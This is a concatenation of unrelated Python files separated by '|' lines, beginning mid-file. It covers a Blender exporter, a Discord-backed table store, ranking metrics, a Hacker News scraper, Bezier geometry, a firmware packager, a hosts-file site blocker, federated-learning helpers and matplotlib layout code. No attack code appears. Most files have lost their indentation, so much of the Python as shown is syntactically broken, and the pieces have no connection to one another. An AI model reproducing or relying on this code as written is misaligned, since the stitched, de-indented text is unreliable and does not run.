self.scene_id = f'untitled-scene'
self.filepath = self.scene_id
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def create_folder_if_does_not_exist(folder_path):
if os.path.isdir(folder_path):
return
os.mkdir(folder_path)
def show_message_box(title = "Message Box", icon = 'INFO', lines=""):
myLines=lines
def draw(self, context):
for n in myLines:
self.layout.label(text=n)
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
def menu_func_export(self, context):
self.layout.operator(ExportARENAScene.bl_idname, text="Export to ARENA")
def register():
bpy.utils.register_class(ExportARENAScene)
bpy.types.TOPBAR_MT_file_export.append(menu_func_export)
def unregister():
bpy.utils.unregister_class(ExportARENAScene)
bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
register()
# test call
bpy.ops.export_arena.scene('INVOKE_DEFAULT')
|
import numpy as np
print('test run')
a = np.asarray([1,2,3])
print(str(a))
|
#!/usr/bin/env python3.7
#-*-coding:utf-8-*-
import discord
from src.discord.database.exceptions import *
from src.discord.database.dataformat import *
class Table:
def __init__(self,db,name):
self.db = db
self.name = name
if not Table.exists(db, name):
raise TableDoesNotExist(db, name)
self.channel = discord.utils.get(db.category.text_channels, name="{}-{}".format(db.name,name))
@staticmethod
def exists(db,name):
chan = discord.utils.get(db.category.text_channels, name="{}-{}".format(db.name,name))
return chan is not None
@classmethod
async def create(cl,db,name):
if cl.exists(db, name):
raise TableAlreadyExist(db, name)
await db.category.create_text_channel("{}-{}".format(db.name,name), reason="creating table in database")
db.logger.info("Creating table %s in database %s",name,db.name)
return cl(db, name)
async def fetch(self):
data = []
self.db.logger.info("Fetching table %s from database %s ...",self.name,self.db.name)
async for message in self.channel.history(limit=None):
data.append(DataFormat.parse(message.content))
self.db.logger.info("Fetching table %s from database %s finished",self.name,self.db.name)
return data
async def delete(self):
await self.channel.delete(reason="delete table")
self.db.logger.info("Removing table %s from database %s",self.name,self.db.name)
async def add_row(self,*data):
data = DataFormat(*data)
await data.send(self.channel)
self.db.logger.info("Added row to table %s from database %s",self.name,self.db.name)
async def delete_row(self,identifier):
#assume the identifier is always in the first column
async for message in self.channel.history(limit=None):
data = DataFormat.parse(message.content)
if data[0] == identifier:
await message.delete()
self.db.logger.info("Removed row from table %s from database %s",self.name,self.db.name)
async def update_row(self,identifier,*data):
#assume the identifier is always in the first column
data = DataFormat(identifier,*data)
async for message in self.channel.history(limit=None):
datadb = DataFormat.parse(message.content)
if datadb[0] == identifier:
await message.edit(content=str(data))
self.db.logger.info("Updated row from table %s from database %s",self.name,self.db.name)
|
# coding=utf-8
# !/usr/bin/python3.6 ## Please use python 3.6
"""
__synopsis__ : Matching Networks for Extreme Classification.
__description__ : Metrics (Precision@k and NDCG@k) for Matching Networks for Extreme Classification.
__project__ : MNXC
__author__ : Vishwak, Samujjwal Ghosh
__version__ : "0.1"
__date__ : "08-11-2018"
__copyright__ : "Copyright (c) 2019"
__license__ : This source code is licensed under the MIT-style license found in the LICENSE file in the root
directory of this source tree.
__classes__ : Metrics
__variables__ :
__methods__ : precision_at_k, dcg_score_at_k, ndcg_score_at_k
"""
import numpy as np
import torch
from logger.logger import logger
seed_val = 0
# random.seed(seed_val)
# np.random.seed(seed_val)
# torch.manual_seed(seed_val)
# torch.cuda.manual_seed_all(seed=seed_val)
def precision_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the precision @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label vector
predictions : np.array consisting of predictive probabilities for every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
precision @ k for a given ground truth - prediction pair.
"""
assert len(actuals) == len(predictions),"P@k: Length mismatch: len(actuals) [{}] == [{}] len(predictions)"\
.format(len(actuals),len(predictions))
    ## Converting to Numpy as it has supported functions.
if torch.is_tensor(actuals):
logger.info("'actuals' is of [{}] type. Converting to Numpy.".format(type(actuals)))
actuals = actuals.numpy()
logger.debug(actuals)
if torch.is_tensor(predictions):
logger.info("'predictions' is of [{}] type. Converting to Numpy.".format(type(predictions)))
predictions = predictions.data.numpy()
logger.debug(predictions)
n_pos_vals = (actuals == pos_label).sum()
    desc_order = np.argsort(predictions, axis=-1)[:, ::-1]  # indices sorted by descending probability
matches = np.take(actuals,desc_order[:,:k]) # taking the top indices
relevant_preds = (matches == pos_label).sum()
return relevant_preds / min(n_pos_vals,k)
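# Illustrative example (hypothetical values; assumes the 2-D layout used above,
# one row per sample):
#   actuals     = np.array([[1, 0, 1]])
#   predictions = np.array([[0.9, 0.1, 0.8]])
#   precision_at_k(actuals, predictions, k=2) -> 1.0, since both top-2 predictions are relevant.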
def dcg_score_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the Discounted Cumulative Gain @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label
vector
predictions : np.array consisting of predictive probabilities for
every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
DCG @ k for a given ground truth - prediction pair.
"""
assert len(actuals) == len(predictions),"DCG@k: Length mismatch: len(actuals) [{}] == [{}] len(predictions)"\
.format(len(actuals),len(predictions))
desc_order = np.argsort(predictions)[::-1] # ::-1 reverses array
actuals = np.take(actuals,desc_order[:k]) # the top indices
gains = 2 ** actuals - 1
discounts = np.log2(np.arange(1,len(actuals) + 1) + 1)
return np.sum(gains / discounts)
def ndcg_score_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the Discounted Cumulative Gain @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label
vector
predictions : np.array consisting of predictive probabilities for
every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
NDCG @ k for a given ground truth - prediction pair.
"""
dcg_at_k = dcg_score_at_k(actuals,predictions,k,pos_label)
best_dcg_at_k = dcg_score_at_k(actuals,actuals,k,pos_label)
return dcg_at_k / best_dcg_at_k
class Metrics:
""" Initializes an Metrics object. """
def __init__(self,cuda_available=None,use_cuda: bool = False) -> None:
if cuda_available is None:
self.cuda_available = torch.cuda.is_available()
else:
self.cuda_available = cuda_available
self.use_cuda = use_cuda
@staticmethod
def precision_k_hot(actuals: torch.Tensor,predictions: torch.Tensor,k: int = 1,pos_label: int = 1) -> float:
"""
Calculates precision of actuals multi-hot vectors and predictions probabilities of shape: (batch_size, Number of samples, Number of categories).
:param actuals: 3D torch.tensor consisting of multi-hot encoding of label vector of shape: (batch_size, Number of samples, Number of categories)
:param predictions: torch.tensor consisting of predictive probabilities for every label: (batch_size, Number of samples, Number of categories)
:param k: Value of k. Default: 1
:param pos_label: Value to consider as positive in Multi-hot vector. Default: 1
:return: Precision @ k for a given ground truth - prediction pair.for a batch of samples.
"""
## Top k probabilities
preds_indices = torch.argsort(predictions,dim=2,descending=True)
preds_desc = preds_indices[:,:,:k]
# com_labels = [] # batch_size, Number of samples
precision_batch = 0
for i in np.arange(predictions.shape[0]): # (batch_size, Number of samples, Number of categories)
precision_samples = 0
for j in np.arange(predictions.shape[1]):
precision_elm = 0
for l in np.arange(preds_desc.shape[2]):
if actuals[i,j,preds_desc[i,j,l].item()] == pos_label: # Checking if top index positions are 1.
precision_elm += 1
precision_samples += precision_elm / preds_desc.shape[2]
precision_batch += precision_samples / predictions.shape[1]
precision = precision_batch / predictions.shape[0]
return precision # , com_labels
if __name__ == '__main__':
cls_count = 3
multi_hot = np.random.randint(2,size=(2,2,cls_count)) # Generates integers till 2-1, i.e. [0 or 1]
logger.debug(multi_hot)
indices = [[[0],[0,2]],[[1],[0,2]]] # Generates integers till [cls_count]
logger.debug(indices)
# indices = np.random.randint(cls_count, size=(1, 2, cls_count)) # Generates integers till [cls_count]
proba = np.random.rand(2,2,cls_count)
logger.debug(proba)
test_metrics = Metrics()
proba_t = torch.from_numpy(proba)
multi_hot_t = torch.from_numpy(multi_hot)
    precision = test_metrics.precision_k_hot(multi_hot_t,proba_t,k=2)
    logger.debug(precision)
    # logger.debug(com_labels)  # precision_k_hot currently returns only the precision value
# logger.debug(proba)
# logger.debug(proba.shape)
# logger.debug(multi_hot)
# logger.debug(multi_hot.shape)
# np_val = precision_at_k(multi_hot, proba, k=1)
# logger.debug(np_val.shape)
# logger.debug(np_val)
# logger.debug(type(np_val))
#
# logger.debug(a_t)
# logger.debug(a_t.shape)
# logger.debug(b_t)
# logger.debug(b_t.shape)
#
# torch_val = precision_at_k(b_t, a_t)
# logger.debug(torch_val.shape)
# logger.debug(torch_val)
# logger.debug(type(torch_val))
|
import requests
from bs4 import BeautifulSoup
from pprint import pprint
import json
response = requests.get('https://news.ycombinator.com/news')
soup = BeautifulSoup(response.text, 'html.parser')
links = soup.select('.storylink')
subtext = soup.select('.subtext')
def sort_stories_by_votes(hmlist):
sorted_data = sorted(hmlist, key=lambda x: x['Votes'], reverse=True)
print(type(sorted_data), len(sorted_data))
return to_json(sorted_data)
def create_custom_hm(links, subtext):
hm = []
for idx, item in enumerate(links):
title = links[idx].getText()
href = links[idx].get('href', None)
vote = subtext[idx].select('.score')
if len(vote):
points = int(vote[0].getText().replace(' points', ''))
if points > 100:
hm.append({'title': title, 'links': href, 'Votes': points})
return sort_stories_by_votes(hm)
def to_json(sorted_data):
with open("data.json", 'w') as file:
json.dump(sorted_data, file)
pprint(create_custom_hm(links, subtext))
|
from mars_profiling.report.presentation.flavours.widget.collapse import WidgetCollapse
from mars_profiling.report.presentation.flavours.widget.container import (
WidgetContainer,
)
from mars_profiling.report.presentation.flavours.widget.duplicate import (
WidgetDuplicate,
)
from mars_profiling.report.presentation.flavours.widget.frequency_table import (
WidgetFrequencyTable,
)
from mars_profiling.report.presentation.flavours.widget.frequency_table_small import (
WidgetFrequencyTableSmall,
)
from mars_profiling.report.presentation.flavours.widget.html import WidgetHTML
from mars_profiling.report.presentation.flavours.widget.image import WidgetImage
from mars_profiling.report.presentation.flavours.widget.root import WidgetRoot
from mars_profiling.report.presentation.flavours.widget.sample import WidgetSample
from mars_profiling.report.presentation.flavours.widget.table import WidgetTable
from mars_profiling.report.presentation.flavours.widget.toggle_button import (
WidgetToggleButton,
)
from mars_profiling.report.presentation.flavours.widget.variable import WidgetVariable
from mars_profiling.report.presentation.flavours.widget.variable_info import (
WidgetVariableInfo,
)
from mars_profiling.report.presentation.flavours.widget.warnings import WidgetWarnings
|
import bpy
from bpy.types import (
Curve,
)
from mathutils import (geometry, Vector)
import numpy
from . import grid
from . import bezier
import importlib
grid = importlib.reload(grid)
bezier = importlib.reload(bezier)
def is_valid_curve(curve):
if curve.dimensions != '2D' or len(curve.splines) != 1:
return False
spline = curve.splines[0]
if len(spline.bezier_points) < 2:
return False
points = spline.bezier_points
return points[len(points)-1].co.x - points[0].co.x > 0
def to_3d(point):
return Vector((point.x, 0, point.y))
class Border:
def __init__(self, cubics = None):
self.cubics = [] if cubics is None else cubics
@staticmethod
def from_curve(curve, flip=False):
border = Border()
points = curve.splines[0].bezier_points
for p0, p1 in zip(points[:-1], points[1:]):
border.cubics.append(bezier.Cubic(p0.co.xy, p0.handle_right.xy, p1.handle_left.xy, p1.co.xy))
if flip:
border.__reverse()
for cubic in border.cubics:
cubic.scale((0,), (-1,))
translation = -border.cubics[0].p
for cubic in border.cubics:
cubic.translate(translation)
return border
@property
def is_flat(self):
ref = self.cubics[0].p.y
return all(all(abs(point.y - ref) < 0.0001 for point in cubic.points) for cubic in self.cubics)
@property
def size(self):
return self.cubics[-1].q.copy()
@property
def length(self):
return self.size.x
@property
def grid_length(self):
return grid.to_grid_length(self.length)
@property
def height(self):
return self.size.y
@property
def grid_height(self):
return grid.to_grid_length(self.height)
def __reverse(self):
for cubic in self.cubics:
cubic.reverse()
self.cubics.reverse()
def flip(self):
        raise Exception('DEPRECATED')
translation = self.cubics[-1].q.x
for cubic in self.cubics:
for point in cubic.points:
point.x = -point.x + translation
cubic.reverse()
self.cubics.reverse()
def sample(self, grid_subdivisions, precision, epsilon=0.0001):
cubics = bezier.subdivide(self.cubics, precision)
points = []
step = grid.length / grid_subdivisions
x = 0
last_cubic_index = 0
length = self.length
while x + epsilon < length:
for cubic_index, cubic in enumerate(cubics[last_cubic_index:]):
if cubic[0].x <= x and x < cubic[3].x:
last_cubic_index = cubic_index
y = cubic[0].y
if x != cubic[0].x:
y = cubic[0].y + (cubic[3].y - cubic[0].y) / (cubic[3].x - cubic[0].x) * (x - cubic[0].x)
points.append(Vector((x, y)))
break
x += step
points.append(self.cubics[-1][3].xy)
return points
def to_curve(self, name='Curve'):
curve = bpy.data.curves.new(name, type='CURVE')
curve.dimensions = '3D'
spline = curve.splines.new('BEZIER')
points = spline.bezier_points
points[0].co = to_3d(self.cubics[0].p)
points[0].handle_right = to_3d(self.cubics[0].r)
v = points[0].handle_right - points[0].co
points[0].handle_left = points[0].co - v
for i in range(len(self.cubics)-1):
points.add(1)
point = points[-1]
point.handle_left = to_3d(self.cubics[i].l)
point.co = to_3d(self.cubics[i].q)
point.handle_right = to_3d(self.cubics[i+1].r)
points.add(1)
points[-1].co = to_3d(self.cubics[-1].q)
points[-1].handle_left = to_3d(self.cubics[-1].l)
v = points[-1].handle_left - points[-1].co
points[-1].handle_right = points[-1].co - v
return curve
def resized(self, new_height, keep_tangents=True):
diff = new_height - self.size[1]
length = self.length
cubics = []
for cubic_index, cubic in enumerate(self.cubics):
dp = cubic.p.x / length * diff
dr = cubic.r.x / length * diff
dl = cubic.l.x / length * diff
dq = cubic.q.x / length * diff
if keep_tangents and cubic_index == 0:
dr = dp
if keep_tangents and cubic_index+1 == len(self.cubics):
dl = dq
cubics.append(bezier.Cubic(
cubic.p + Vector((0, dp)),
cubic.r + Vector((0, dr)),
cubic.l + Vector((0, dl)),
cubic.q + Vector((0, dq))
))
return Border(cubics)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 1. Prepare bootloader.bin
# 2. Build the project and output rt-thread.bin
# 3. Use the OTA packager tool with encryption and compression disabled, set the firmware partition name to "app", fill in the version number, and click "start packing" to package rt-thread.bin into rt-thread.rbl
# 4. Copy bootloader.bin and rt-thread.rbl into the AllBinPackager.py directory
# 5. Configure config.json with the file names, partition offset addresses, and partition sizes (in hexadecimal)
# 6. Open a command prompt in the AllBinPackager.py directory and run `python AllBinPackager.py` to produce all.bin
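# An illustrative config.json for this script (the key names match what
# allbin_packager() reads below; the file names, offsets, and sizes are
# hypothetical placeholders):
# {
#     "bootloader": {"file": "bootloader.bin", "partition_offset_addr": "0x0", "partition_size": "0x10000"},
#     "app": {"file": "rt-thread.rbl", "partition_offset_addr": "0x10000", "partition_size": "0x90000"}
# }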
import sys
import json
# Fix garbled-character (encoding) issues
reload(sys)
sys.setdefaultencoding( "utf-8" )
def load_json_to_dic(file):
load_dict = {}
with open(file, 'r') as load_f:
try:
load_dict = json.load(load_f)
except Exception as ex:
load_dict = {}
raise Exception, "load json file error!"
return load_dict
class allbin():
boot_file = None
boot_raw_data = None
boot_rbl_data = None
app_file = None
app_raw_data = None
app_rbl_data = None
def file_handler(self, in_file, out_file, part_size = 0, offset_addr = 0):
self.raw_data = None
self.rbl_data = None
file_seek = 0
if (in_file[-4:] == ".bin"):
print("=== bin")
with open(in_file, 'rb') as f:
f.seek(0, 0)
self.raw_data = f.read()
elif (in_file[-4:] == ".rbl"):
print("--- rbl")
file_seek = part_size - 96
with open(in_file, 'rb') as f:
f.seek(0, 0)
self.rbl_data = f.read(96)
self.raw_data = f.read()
with open(out_file, 'wb') as f:
if (self.raw_data != None):
f.write(self.raw_data)
if (self.rbl_data != None):
f.seek(file_seek, 0)
f.write(self.rbl_data)
return
def allbin_packager(self, cfg_file = "config.json"):
try:
config_dict = load_json_to_dic(cfg_file)
if len(config_dict) == 0:
return -1
if not (config_dict.has_key("bootloader") and config_dict.has_key("app")):
return -1
self.boot_file = config_dict["bootloader"]["file"]
self.app_file = config_dict["app"]["file"]
print(self.boot_file[-4:])
print(self.app_file[-4:])
print("boot")
self.boot_part_size = int(config_dict["bootloader"]["partition_size"], 16)
self.boot_offset_addr = int(config_dict["bootloader"]["partition_offset_addr"], 16)
self.file_handler(self.boot_file, "test_boot_rbl.bin", self.boot_part_size, self.boot_offset_addr)
print("app")
self.app_part_size = int(config_dict["app"]["partition_size"], 16)
self.app_offset_addr = int(config_dict["app"]["partition_offset_addr"], 16)
self.file_handler(self.app_file, "test_app_rbl.bin", self.app_part_size, self.app_offset_addr)
with open("all.bin", 'wb') as allbin_f:
with open("test_boot_rbl.bin", 'rb') as boot_f:
allbin_f.write(boot_f.read())
with open("test_app_rbl.bin", 'rb') as app_f:
allbin_f.seek(self.app_offset_addr, 0)
allbin_f.write(app_f.read())
except Exception as ex:
raise Exception, "all bin packager failed!"
return 0
if __name__ == "__main__":
print('RT-Thread all.bin packager v1.0.0')
all_bin_o = allbin()
all_bin_o.allbin_packager()
print('all.bin packager success!')
|
"""concentration/settings.py
Defines how the basic concentration settings get loaded.
"""
import os
import sys
from enum import Enum
OS = Enum('OS', 'linux mac windows')
HOSTS_FILE = "/etc/hosts"
REDIRECT_TO = "127.0.0.1"
START_TOKEN = "## START DISTRACTORS ##"
END_TOKEN = "## END DISTRACTORS ##"
SUB_DOMAINS = ('www', 'news')
DISTRACTORS = {'ycombinator.com', 'slashdot.com', 'facebook.com', 'reddit.com', 'gawker.com', 'theverge.com',
'techcrunch.com', 'thenextweb.com', 'wired.com', 'gizmodo.com', 'slickdeals.net',
'mashable.com', 'digitaltrends.com', 'techradar.com', 'twitter.com', 'tumblr.com',
'technorati.com', 'digg.com', 'buzzfeed.com', 'twitter.com', 'youtube.com', 'netflix.com',
'iwastesomuchtime.com', 'pinterest.com', 'ebay.com', 'thepointsguy.com', 'imgur.com', 'woot.com',
'flyertalk.com', 'instagram.com', 'medium.com', 'meetup.com', 'distrowatch.com',
'arstechnica.com', 'phoronix.com', 'arstechnica.com', 'failblog.com', 'redfin.com', 'realtor.com',
'zillow.com', 'trulia.com', 'cnn.com', 'fox.com', 'realclearpolitics.com', 'yelp.com',
'opentable.com', 'slashdot.org', 'xkcd.com', 'cnet.com', 'tomshardware.com', 'engadget.com', 'zdnet.com',
'techrepublic.com', 'gizmag.com', 'anandtech.com', 'imore.com', 'gsmarena.com ', 'geek.com',
'firstpost.com', 'wearables.com', 'stripgenerator.com', 'fmylife.com', 'liveplasma.com', 'cracked.com',
'befunky.com', 'pcworld.com', 'typepad.com', 'pogo.com', 'omegle.com', 'lifehacker.com', 'answerbag.com',
'cheezburger.com', 'fark.com', 'popurls.com', 'sho.com', 'hulu.com', 'myparentsjoinedfacebook.com',
'homestarrunner.com', 'petsinclothes.com', 'freerice.com', 'everypoet.com', 'mono-1.com',
'mcsweeneys.net', 'postsecret.com', 'textsfromlastnight.com', 'awkwardfamilyphotos.com', 'myspace.com',
'lunchtimers.com', 'twitterfall.com', 'break.com', 'passiveaggressivenotes.com', 'sciencemag.org',
'bbc.com', 'notalwaysright.com'}
for config_file_path in ('/etc/concentration.distractors', os.path.expanduser('~/.concentration.distractors')):
if os.path.isfile(config_file_path):
with open(config_file_path) as config_file:
DISTRACTORS.update(config_file.read().splitlines())
for config_file_path in ('/etc/concentration.safe', os.path.expanduser('~/.concentration.safe')):
if os.path.isfile(config_file_path):
with open(config_file_path) as config_file:
DISTRACTORS.difference_update(config_file.read().splitlines()) # Remove all white listed domains
DISTRACTORS.discard('')
PLATFORM = OS.linux
for platform in (("linux", OS.linux), ("darwin", OS.mac), ("win32", OS.windows)):
if platform[0] in sys.platform:
PLATFORM = platform[1]
RESTART_NETWORK = {OS.linux: [["/etc/init.d/networking", "restart"],
["/etc/init.d/nscd", "restart"],
["/etc/rc.d/nscd", "restart"],
["/etc/rc.d/init.d/nscd", "restart"]],
OS.mac: [["dscacheutil", "-flushcache"]],
OS.windows: [["ipconfig", "/flushdns"]]}[PLATFORM]
if PLATFORM is OS.windows:
HOSTS_FILE = "/Windows/System32/drivers/etc/hosts"
|
""" Contains example functions for handling training """
import tensorflow as tf
import tf_encrypted as tfe
### Example model_fns ###
def default_model_fn(data_owner):
"""Runs a single training step!"""
x, y = next(data_owner.dataset)
with tf.name_scope("gradient_computation"):
with tf.GradientTape() as tape:
preds = data_owner.model(x)
loss = tf.reduce_mean(data_owner.loss(y, preds, from_logits=True))
grads = tape.gradient(loss, data_owner.model.trainable_variables)
return grads
def reptile_model_fn(data_owner, iterations=3,
grad_fn=default_model_fn, **kwargs):
"""
This corresponds to the Reptile variant that computes k steps of SGD.
When paired with the secure_aggregation aggregator_fn, this model_fn
corresponds to using g_k as the outer gradient update. See the Reptile
paper for more: https://arxiv.org/abs/1803.02999
"""
for _ in range(iterations):
grads_k = grad_fn(data_owner, **kwargs)
data_owner.optimizer.apply_gradients(
zip(grads_k, data_owner.model.trainable_variables),
)
return [var.read_value() for var in data_owner.model.trainable_variables]
### Example aggregator_fns ###
def secure_mean(collected_inputs):
""" securely calculates the mean of the collected_inputs """
with tf.name_scope('secure_mean'):
aggr_inputs = [
tfe.add_n(inputs) / len(inputs)
for inputs in collected_inputs
]
# Reveal aggregated values & cast to native tf.float32
aggr_inputs = [tf.cast(inp.reveal().to_native(), tf.float32)
for inp in aggr_inputs]
return aggr_inputs
def secure_reptile(collected_inputs, model):
aggr_weights = secure_mean(collected_inputs)
weights_deltas = [
weight - update for (weight, update) in zip(
model.trainable_variables, aggr_weights,
)
]
return weights_deltas
### Example evaluator_fns ###
def evaluate_classifier(model_owner):
"""Runs a validation step!"""
x, y = next(model_owner.evaluation_dataset)
with tf.name_scope('validate'):
predictions = model_owner.model(x)
loss = tf.reduce_mean(model_owner.loss(y, predictions, from_logits=True))
return loss
|
#!/usr/bin/env python
#
# Searches through the whole source tree and validates all
# documentation files against our own XSD in docs/xsd.
#
import sys,os
import SConsDoc
if __name__ == "__main__":
if len(sys.argv)>1:
if SConsDoc.validate_all_xml((sys.argv[1],)):
print("OK")
else:
print("Validation failed! Please correct the errors above and try again.")
else:
if SConsDoc.validate_all_xml(['src',
os.path.join('doc','design'),
os.path.join('doc','developer'),
os.path.join('doc','man'),
os.path.join('doc','python10'),
os.path.join('doc','reference'),
os.path.join('doc','user')
]):
print("OK")
else:
print("Validation failed! Please correct the errors above and try again.")
sys.exit(1)
|
"""This module contains the general information for Error ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import ImcVersion, MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class ErrorConsts():
pass
class Error(ManagedObject):
"""This is Error class."""
consts = ErrorConsts()
naming_props = set([])
mo_meta = MoMeta("Error", "error", "", VersionMeta.Version151f, "OutputOnly", 0x1, [], [""], [], [], [None])
prop_meta = {
"cookie": MoPropertyMeta("cookie", "cookie", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"error_code": MoPropertyMeta("error_code", "errorCode", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"error_descr": MoPropertyMeta("error_descr", "errorDescr", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"invocation_result": MoPropertyMeta("invocation_result", "invocationResult", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"response": MoPropertyMeta("response", "response", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, ["No", "Yes", "false", "no", "true", "yes"], []),
}
prop_map = {
"cookie": "cookie",
"errorCode": "error_code",
"errorDescr": "error_descr",
"invocationResult": "invocation_result",
"response": "response",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.cookie = None
self.error_code = None
self.error_descr = None
self.invocation_result = None
self.response = None
ManagedObject.__init__(self, "Error", parent_mo_or_dn, **kwargs)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
from psd_tools import PSDImage
from psd_tools.constants import TaggedBlock
from psd_tools.decoder.actions import Descriptor
from psd_tools.decoder.tagged_blocks import ArtboardData
from .utils import decode_psd, DATA_PATH
from PIL import Image
def test_advanced_blending():
decoded = decode_psd('advanced-blending.psd')
layer_records = decoded.layer_and_mask_data.layers.layer_records
tagged_blocks = dict(layer_records[1].tagged_blocks)
assert not tagged_blocks.get(TaggedBlock.BLEND_CLIPPING_ELEMENTS)
assert tagged_blocks.get(TaggedBlock.BLEND_INTERIOR_ELEMENTS)
tagged_blocks = dict(layer_records[3].tagged_blocks)
assert isinstance(tagged_blocks.get(TaggedBlock.ARTBOARD_DATA1),
ArtboardData)
def test_blend_and_clipping():
psd = PSDImage(decode_psd('blend-and-clipping.psd'))
for layer in psd.layers:
assert isinstance(layer.as_PIL(), Image.Image)
|
from . import audio_io
from . import constants
from . import files
from scipy import signal
import json
import numpy as np
import os
ERROR = 'fp.getframerate() != constants.FRAME_RATE: 48000'
def get_framerate_error_files():
for f in sorted(files.with_suffix(constants.METADATA_DIR, '.json')):
if json.load(open(f)).get('error') == ERROR:
yield constants.source(os.path.basename(f)[:-5])
def resample_file(filename):
if True:
original = filename
filename = filename + '.48KHz'
else:
original = filename + '.48KHz'
os.rename(filename, original)
fp, frames = audio_io.read_frames_and_fp(original)
assert fp.getframerate() == 48000
samples = audio_io.from_frames(frames, fp.getnchannels())
resampled = np.stack([signal.resample_poly(s, 160, 147) for s in samples])
audio_io.write(filename, resampled)
print('Resampled to', filename)
if __name__ == '__main__':
# resample_file(list(get_framerate_error_files())[
for f in get_framerate_error_files():
print(f)
|
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import gridspec
import palettable
#CMAP1 = palettable.cartocolors.sequential.Teal_7.mpl_colormap
#CMAP2 = palettable.cartocolors.sequential.Teal_7.mpl_colormap
#COLORS = palettable.cartocolors.sequential.Teal_4_r.mpl_colors
TEXTWIDTH = 7.1014 # inches
CMAP1 = palettable.cmocean.sequential.Ice_20_r.mpl_colormap
CMAP2 = palettable.cmocean.sequential.Ice_20.mpl_colormap
COLORS = palettable.cmocean.sequential.Ice_6_r.mpl_colors
COLOR_FULL = COLORS[4] # "#B3004A"
COLOR_MASS = COLORS[3] # "#4CBFAC"
COLOR_ALIGN = COLORS[2] # "#5B4CFF"
COLOR_FIX = COLORS[1] # "#B7B7B7"
COLOR_BKG = "0.7" # "#B7B7B7"
def setup():
matplotlib.rcParams.update({'text.usetex': True, 'font.size': 10, 'font.family': 'serif'})
params= {'text.latex.preamble' : [r'\usepackage{amsmath}', r'\usepackage{amssymb}']}
plt.rcParams.update(params)
def figure(cbar=False, height=TEXTWIDTH*0.4, large_margin=0.18, mid_margin=0.14, small_margin=0.05, cbar_sep=0.03, cbar_width=0.04):
if cbar:
width = height * (1. + cbar_sep + cbar_width + large_margin - small_margin)
top = small_margin
bottom = mid_margin
left = large_margin
right = large_margin + cbar_width + cbar_sep
cleft = 1. - (large_margin + cbar_width) * height / width
cbottom = bottom
cwidth = cbar_width * height / width
cheight = 1. - top - bottom
fig = plt.figure(figsize=(width, height))
ax = plt.gca()
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=0.,
hspace=0.,
)
cax = fig.add_axes([cleft, cbottom, cwidth, cheight])
plt.sca(ax)
return fig, (ax, cax)
else:
width = height
left = large_margin
right = small_margin
top = small_margin
bottom = mid_margin
fig = plt.figure(figsize=(width, height))
ax = plt.gca()
plt.subplots_adjust(
left=left,
right=1. - right,
bottom=bottom,
top=1. - top,
wspace=0.,
hspace=0.,
)
return fig, ax
def grid(nx=4, ny=2, height=6., n_caxes=0, large_margin=0.02, small_margin=0.02, sep=0.02, cbar_width=0.03):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
# Absolute width
width = height*(left + nx*panel_size+ (nx-1)*sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = (height*panel_size * nx * ny + n_caxes * cbar_width * height) / (nx * ny + n_caxes)
avg_height_abs = height*panel_size
wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
# Colorbar axes in last panel
caxes = []
if n_caxes > 0:
ax = plt.subplot(ny, nx, nx*ny)
ax.axis("off")
pos = ax.get_position()
cax_total_width=pos.width / n_caxes
cbar_width_ = cbar_width * height / width
for i in range(n_caxes):
cax = fig.add_axes([pos.x0 + i * cax_total_width, pos.y0, cbar_width_, pos.height])
cax.yaxis.set_ticks_position('right')
caxes.append(cax)
return fig, caxes
def grid_width(nx=4, ny=2, width=TEXTWIDTH, n_caxes=0, large_margin=0.025, small_margin=0.025, sep=0.025, cbar_width=0.04):
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1) * sep) / ny
height = width / (left + nx * panel_size + (nx - 1) * sep + right)
return grid(nx, ny, height, n_caxes, large_margin, small_margin, sep, cbar_width)
def grid2(nx=4, ny=2, height=6., large_margin=0.14, small_margin=0.03, sep=0.03, cbar_width=0.06):
# Geometry
left = large_margin
right = large_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
width = height*(left + nx*panel_size + cbar_width + nx*sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = (height*panel_size * nx * ny + ny * cbar_width * height) / (nx * ny + ny)
avg_height_abs = height*panel_size
wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
